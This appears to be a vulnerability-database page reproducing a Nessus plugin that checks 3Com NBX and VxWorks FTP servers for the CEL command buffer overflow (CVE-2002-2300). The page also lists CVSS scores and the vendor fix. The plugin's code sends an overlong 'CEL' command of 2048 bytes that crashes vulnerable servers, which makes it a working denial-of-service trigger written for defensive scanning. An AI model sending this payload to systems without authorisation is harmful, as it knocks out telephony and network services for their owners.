Lucene search

K
nessusThis script is Copyright (C) 2002-2024 Michael ScheidellVXWORKS_FTPDDOS.NASL
HistoryDec 02, 2002 - 12:00 a.m.

3Com NBX ftpd CEL Command Remote Overflow (2)

2002-12-0200:00:00
This script is Copyright (C) 2002-2024 Michael Scheidell
www.tenable.com
28

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

Low

EPSS

0.105

Percentile

95.1%

The remote FTP server appears to be affected by a buffer overflow that can be triggered with an overly-long ‘CEL’ command. This problem is similar to the ‘aix ftpd’ overflow but on embedded VxWorks-based systems like the 3Com NBX IP phone call manager and seems to cause the server to crash. It is known to affected VxWorks ftpd versions between 5.4 and 5.4.2.

#
# This script derived from aix_ftpd by Michael Scheidell at SECNAP
#
# original script  written by Renaud Deraison <[email protected]>
#
# See the Nessus Scripts License for details
#
# References:
# From: "Michael S. Scheidell" <[email protected]>
# Subject: [VU#317417] Denial of Service condition in vxworks ftpd/3com nbx
# To: "BugTraq" <[email protected]>, <[email protected]>,
#    <[email protected]>
# Date: Mon, 2 Dec 2002 13:04:31 -0500
#

include("compat.inc");

if (description)
{
 script_id(11184);
 script_version("1.31");
 script_set_attribute(attribute:"plugin_modification_date", value:"2024/01/16");

 script_cve_id("CVE-2002-2300");
 script_bugtraq_id(6297, 7480);

 script_name(english:"3Com NBX ftpd CEL Command Remote Overflow (2)");
 script_summary(english:"Tries to CRASH VxWorks ftpd server with CEL overflow");

 script_set_attribute(attribute:"synopsis", value:"The remote FTP server is affected by a buffer overflow vulnerability.");
 script_set_attribute(attribute:"description", value:
"The remote FTP server appears to be affected by a buffer overflow that
can be triggered with an overly-long 'CEL' command. This problem is
similar to the 'aix ftpd' overflow but on embedded VxWorks-based
systems like the 3Com NBX IP phone call manager and seems to cause the
server to crash. It is known to affected VxWorks ftpd versions between
5.4 and 5.4.2.");
 script_set_attribute(attribute:"see_also", value:"http://www.secnap.net/security/nbx001.html");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2003/Apr/344");
 script_set_attribute(attribute:"solution", value:
"If you are using an embedded VxWorks product, please contact the OEM
vendor and reference WindRiver field patch TSR 296292. If this is the
3Com NBX IP Phone call manager, contact 3Com.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L");
 script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
 script_set_attribute(attribute:"cvss_score_source", value:"CVE-2002-2300");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_cwe_id(119);

 script_set_attribute(attribute:"vuln_publication_date", value:"2002/12/02");
 script_set_attribute(attribute:"plugin_publication_date", value:"2002/12/02");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_family(english:"FTP");

 script_copyright(english:"This script is Copyright (C) 2002-2024 Michael Scheidell");

 script_dependencies("ftpserver_detect_type_nd_version.nasl");
 script_require_keys("ftp/vxftpd", "Settings/ParanoidReport");
 script_require_ports("Services/ftp", 21);

 exit(0);
}

include("ftp_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_ftp_port(default: 21);

soc = open_sock_tcp(port);
if (! soc) exit(1);

  dbg::detailed_log(name:'ftp_func', src:SCRIPT_NAME, lvl:2, msg:"Getting the FTP banner.");
  buf = ftp_recv_line(socket:soc);
  if(!buf){
    close(soc);
    exit(1, "Could not read the FTP banner on port "+port+".");
	}
  start_denial();

buf = 'CEL a\r\n';
send(socket:soc, data:buf);
r = recv_line(socket:soc, length:1024);
if (!r)
  exit(1, "No answer from FTP server on port "+port+".");

buf = ('CEL ' + crap(2048) + '\r\n');
send(socket:soc, data:buf);
b = recv_line(socket:soc, length:1024);
ftp_close(socket: soc);
alive = end_denial();

if(!b)
  security_hole(port);
if(!alive)
  set_kb_item(name:"Host/dead", value:TRUE);

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

Low

EPSS

0.105

Percentile

95.1%

Related for VXWORKS_FTPDDOS.NASL